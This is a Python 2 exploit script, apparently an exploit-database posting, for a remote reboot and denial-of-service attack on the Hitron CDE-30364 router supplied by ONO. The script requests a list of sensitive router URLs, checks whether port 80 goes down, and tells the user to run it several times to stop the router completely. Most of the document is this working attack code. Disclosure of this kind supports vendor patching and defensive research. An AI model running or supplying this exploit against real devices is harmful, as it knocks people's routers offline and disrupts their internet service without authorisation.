#!/usr/bin/python #----------------------------------------------------------------------------------------- #Description: #----------------------------------------------------------------------------------------- #Hitron Technologies CDE-30364 is a famous ONO Router. #Scanning certain sensitive urls the router is restarted. If you run the script several times, it stops working. import httplib import socket import time print "\n###########################################################################################################" print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote reboot #" print "# Date: 8-10-2013 #" print "# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org #" print "# Vendor Homepage: http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/ #" print "# Tested on: Hitron Technologies CDE-30364 #" print "# Version HW: 1A #" print "# Version SW: 3.1.0.8-ONO #" print "###########################################################################################################\n" host = '192.168.1.1' #Sensitive urls directories = ['login.asp', 'config.asp', 'reset.asp', 'css', 'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/', 'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login', 'goform/ConfigCable', 'admin/cable-Systeminfo.asp'] for directory in directories: conn = httplib.HTTPConnection(host) conn.request('GET', '/' + directory) r1 = conn.getresponse() print r1.status, r1.reason conn.close() #Check 80 port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) time.sleep(4) try: s.connect((host, 80)) s.shutdown(2) print "\n" print "----------------------------------------------------------\n" print "Attack Fail!\n" except: print "----------------------------------------------------------\n" print "Attack Successful! The router is rebooting!\n" print "Run the script several times to stop router completely!\n" -- Un saludo, Matías Mingorance Svensson *OWASP Foundation, Open Web Application Security Project* https://www.owasp.org http://es.linkedin.com/in/matiasms